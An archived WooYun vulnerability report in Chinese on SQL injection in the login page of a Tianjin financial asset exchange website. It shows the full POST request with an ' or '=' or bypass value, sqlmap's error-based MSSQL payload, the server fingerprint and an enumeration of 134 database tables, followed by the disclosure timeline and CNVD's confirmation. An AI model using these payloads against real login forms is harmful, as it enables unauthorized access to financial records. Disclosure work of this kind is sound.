乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-31: 细节已通知厂商并且等待厂商处理中 2015-11-04: 厂商已经确认,细节仅向厂商公开 2015-11-14: 细节向核心白帽子及相关领域专家公开 2015-11-24: 细节向普通白帽子公开 2015-12-04: 细节向实习白帽子公开 2015-12-19: 细节向公众公开
天津金融资产交易所某站sql注入漏洞
后台存在SQL漏洞,134张表,SA权限,可列出并破解数据库用户的hash注入地址:
POST /Login.aspx HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://**.**.**.**/Login.aspxConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 436__LASTFOCUS=&__EVENTTARGET=txtUserName&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTQyOTYwODY3Nw9kFgICAQ9kFgQCAQ8PFgIeBFRleHQFASdkZAIHDw8WAh8ABR7nmbvlvZXlkI3miJblr4bnoIHkuI3mraPnoa7vvIFkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUJaWJ0bkxvZ0luDn2ZN3vSlWPQi3pJB31Lq75HA40%3D&txtUserName=%27or%27%3D%27or%27&txtPassWord=1&ibtnLogIn.x=33&ibtnLogIn.y=6&__EVENTVALIDATION=%2FwEWBALS0PSPBwKl1bKzCQK1qbSWCwKBo5TKDiRy4XUvJXGk8eyNBaooo9d8phlb
Parameter: txtUserName (POST) Type: error-based Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause Payload: __LASTFOCUS=&__EVENTTARGET=txtUserName&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTQyOTYwODY3Nw9kFgICAQ9kFgQCAQ8PFgIeBFRleHQFhRBTeXN0ZW0uRGF0YS5TcWxDbGllbnQuU3FsRXhjZXB0aW9uOiDlnKjlhbPplK7lrZcgJ29yJyDpmYTov5HmnInor63ms5XplJnor6/jgIINCiAgIOWcqCBTeXN0ZW0uRGF0YS5TcWxDbGllbnQuU3FsQ29ubmVjdGlvbi5PbkVycm9yKFNxbEV4Y2VwdGlvbiBleGNlcHRpb24sIEJvb2xlYW4gYnJlYWtDb25uZWN0aW9uKQ0KICAg5ZyoIFN5c3RlbS5EYXRhLlNxbENsaWVudC5TcWxJbnRlcm5hbENvbm5lY3Rpb24uT25FcnJvcihTcWxFeGNlcHRpb24gZXhjZXB0aW9uLCBCb29sZWFuIGJyZWFrQ29ubmVjdGlvbikNCiAgIOWcqCBTeXN0ZW0uRGF0YS5TcWxDbGllbnQuVGRzUGFyc2VyLlRocm93RXhjZXB0aW9uQW5kV2FybmluZyhUZHNQYXJzZXJTdGF0ZU9iamVjdCBzdGF0ZU9iaikNCiAgIOWcqCBTeXN0ZW0uRGF0YS5TcWxDbGllbnQuVGRzUGFyc2VyLlJ1bihSdW5CZWhhdmlvciBydW5CZWhhdmlvciwgU3FsQ29tbWFuZCBjbWRIYW5kbGVyLCBTcWxEYXRhUmVhZGVyIGRhdGFTdHJlYW0sIEJ1bGtDb3B5U2ltcGxlUmVzdWx0U2V0IGJ1bGtDb3B5SGFuZGxlciwgVGRzUGFyc2VyU3RhdGVPYmplY3Qgc3RhdGVPYmopDQogICDlnKggU3lzdGVtLkRhdGEuU3FsQ2xpZW50LlNxbERhdGFSZWFkZXIuQ29uc3VtZU1ldGFEYXRhKCkNCiAgIOWcqCBTeXN0ZW0uRGF0YS5TcWxDbGllbnQuU3FsRGF0YVJlYWRlci5nZXRfTWV0YURhdGEoKQ0KICAg5ZyoIFN5c3RlbS5EYXRhLlNxbENsaWVudC5TcWxDb21tYW5kLkZpbmlzaEV4ZWN1dGVSZWFkZXIoU3FsRGF0YVJlYWRlciBkcywgUnVuQmVoYXZpb3IgcnVuQmVoYXZpb3IsIFN0cmluZyByZXNldE9wdGlvbnNTdHJpbmcpDQogICDlnKggU3lzdGVtLkRhdGEuU3FsQ2xpZW50LlNxbENvbW1hbmQuUnVuRXhlY3V0ZVJlYWRlclRkcyhDb21tYW5kQmVoYXZpb3IgY21kQmVoYXZpb3IsIFJ1bkJlaGF2aW9yIHJ1bkJlaGF2aW9yLCBCb29sZWFuIHJldHVyblN0cmVhbSwgQm9vbGVhbiBhc3luYykNCiAgIOWcqCBTeXN0ZW0uRGF0YS5TcWxDbGllbnQuU3FsQ29tbWFuZC5SdW5FeGVjdXRlUmVhZGVyKENvbW1hbmRCZWhhdmlvciBjbWRCZWhhdmlvciwgUnVuQmVoYXZpb3IgcnVuQmVoYXZpb3IsIEJvb2xlYW4gcmV0dXJuU3RyZWFtLCBTdHJpbmcgbWV0aG9kLCBEYkFzeW5jUmVzdWx0IHJlc3VsdCkNCiAgIOWcqCBTeXN0ZW0uRGF0YS5TcWxDbGllbnQuU3FsQ29tbWFuZC5SdW5FeGVjdXRlUmVhZGVyKENvbW1hbmRCZWhhdmlvciBjbWRCZWhhdmlvciwgUnVuQmVoYXZpb3IgcnVuQmVoYXZpb3IsIEJvb2xlYW4gcmV0dXJuU3RyZWFtLCBTdHJpbmcgbWV0aG9kKQ0KICAg5ZyoIFN5c3RlbS5EYXRhLlNxbENsaWVudC5TcWxDb21tYW5kLkV4ZWN1dGVSZWFkZXIoQ29tbWFuZEJlaGF2aW9yIGJlaGF2aW9yLCBTdHJpbmcgbWV0aG9kKQ0KICAg5ZyoIFN5c3RlbS5EYXRhLlNxbENsaWVudC5TcWxDb21tYW5kLkV4ZWN1dGVEYkRhdGFSZWFkZXIoQ29tbWFuZEJlaGF2aW9yIGJlaGF2aW9yKQ0KICAg5ZyoIFN5c3RlbS5EYXRhLkNvbW1vbi5EYkNvbW1hbmQuU3lzdGVtLkRhdGEuSURiQ29tbWFuZC5FeGVjdXRlUmVhZGVyKENvbW1hbmRCZWhhdmlvciBiZWhhdmlvcikNCiAgIOWcqCBTeXN0ZW0uRGF0YS5Db21tb24uRGJEYXRhQWRhcHRlci5GaWxsSW50ZXJuYWwoRGF0YVNldCBkYXRhc2V0LCBEYXRhVGFibGVbXSBkYXRhdGFibGVzLCBJbnQzMiBzdGFydFJlY29yZCwgSW50MzIgbWF4UmVjb3JkcywgU3RyaW5nIHNyY1RhYmxlLCBJRGJDb21tYW5kIGNvbW1hbmQsIENvbW1hbmRCZWhhdmlvciBiZWhhdmlvcikNCiAgIOWcqCBTeXN0ZW0uRGF0YS5Db21tb24uRGJEYXRhQWRhcHRlci5GaWxsKERhdGFTZXQgZGF0YVNldCwgSW50MzIgc3RhcnRSZWNvcmQsIEludDMyIG1heFJlY29yZHMsIFN0cmluZyBzcmNUYWJsZSwgSURiQ29tbWFuZCBjb21tYW5kLCBDb21tYW5kQmVoYXZpb3IgYmVoYXZpb3IpDQogICDlnKggU3lzdGVtLkRhdGEuQ29tbW9uLkRiRGF0YUFkYXB0ZXIuRmlsbChEYXRhU2V0IGRhdGFTZXQpDQogICDlnKggREFMLlVzZXJMb2dpbi5HZXRVc2VyTmFtZShTdHJpbmcgVXNlck5hbWUpZGQCBw8PFgIfAAUe55m75b2V5ZCN5oiW5a+G56CB5LiN5q2j56Gu77yBZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCWlidG5Mb2dJbrxwE7sphNdEvH2/dpGa61pKXALf&txtUserName=-8832') OR 4454=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(107)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4454=4454) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(107)+CHAR(113))) AND ('VYtM'='VYtM&txtPassWord=1&ibtnLogIn.x=33&ibtnLogIn.y=6&__EVENTVALIDATION=/wEWBAKtqufXDAKl1bKzCQK1qbSWCwKBo5TKDuoowWxv3lzjCrWavsEoT32Xg+0X Vector: OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000Database: nprtcm
134张表:
Database: nprtcm[134 tables]+----------------------------+| A_HangCancel || A_HangTimeRenew || A_HangtimeLimit || A_HangupAgain || A_ModifyInformation || A_PayeeChange || A_ScarcityRegistApply || CR_CalculateColumn || CR_Column || CR_GroupbyCondition || CR_JoinTableCondition || CR_OrderbyCondition || CR_Report || CR_UsedColumn || CR_UsedView || CR_View || CR_WhereCause || C_AuctionChange || C_HouseChange || C_Investment || C_PracticalityChange || C_PropertyChange || C_Purchase || C_StockChange || C_TechnologyChange || D_PracticalityTransfer || D_PracticalityTransfer$ || D_PropertyTransfer || D_StockPropertyTransfer || D_TechnologyTransfer || G_GranteeName || G_ManageProperty || G_PracticalityTransfer || G_PropertyTransfer || G_StockPropertyTransfer || G_TechnologyTransfer || M_Associator || M_AssociatorAuditing || PropertyItemDetail || R_AgreementStatistic || R_AppraiseStatistic || R_HangGrantee || R_HangStatistic || ReportForBar || S_AppraiseTitle || S_Area || S_AssociatorKind || S_Category || S_Certificate || S_ClassKind || S_CodeLength || S_Country || S_Currency || S_Department || S_District || S_DocumentDetail || S_Documents || S_EconomyKind || S_FlowCourse || S_FlowDetail || S_GlebeKind || S_Headship || S_Industry || S_Industry$ || S_ItemPhase || S_Local || S_Log || S_Market || S_Message || S_Module || S_MonitorUser || S_NetUser || S_NetUserKind || S_NorthMarketUser || S_NorthUserCode || S_Popedom_Dep || S_Popedom_User || S_PrintDocument || S_Prompt || S_PropertyKind || S_PropertyTransferKind || S_Table || S_TechnologyTransferKind || S_Time || S_User || S_UserKind || S_Vocation || T_AppraiseAuditing || T_BalanceInAudit || T_BalanceOutAudit || T_BalanceSheet || T_CommissionProtocol || T_DocumentsList || T_MostlyConstruction || T_MostlyEquipment || T_PracticalityTransfer || T_PropertyTransfer || T_StockPropertyTransfer || T_TechnologyTransfer || T_TradeContract || T_TradeUnit || T_TransferRequest || T_TransferWorthiness || dtproperties || syncobj_0x3032383843333645 || syncobj_0x3043303532324146 || syncobj_0x3135333030313945 || syncobj_0x3142413734303633 || syncobj_0x3232363239443035 || syncobj_0x3244343138333831 || syncobj_0x3245313837383944 || syncobj_0x3337373031383743 || syncobj_0x3434304131453641 || syncobj_0x3636453544393942 || syncobj_0x3638384242463443 || syncobj_0x3735424546303741 || syncobj_0x3741313135393430 || syncobj_0x3838343042463333 || syncobj_0x3845324235423544 || syncobj_0x3937344635443938 || syncobj_0x3939374136304631 || syncobj_0x3942333443323036 || syncobj_0x4135324146323133 || syncobj_0x4136443133463835 || syncobj_0x4232313330363446 || syncobj_0x4330324334464142 || syncobj_0x4330393745354236 || syncobj_0x4331394342383041 || syncobj_0x4436314534343635 || syncobj_0x4541324344384143 || syncobj_0x4544463641343335 || syncobj_0x4630333630313041 || sysconstraints || syssegments |+----------------------------+
点到为止
过滤
危害等级:高
漏洞Rank:10
确认时间:2015-11-04 14:33
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发对应分中心,由其后续协调网站管理单位处置。
暂无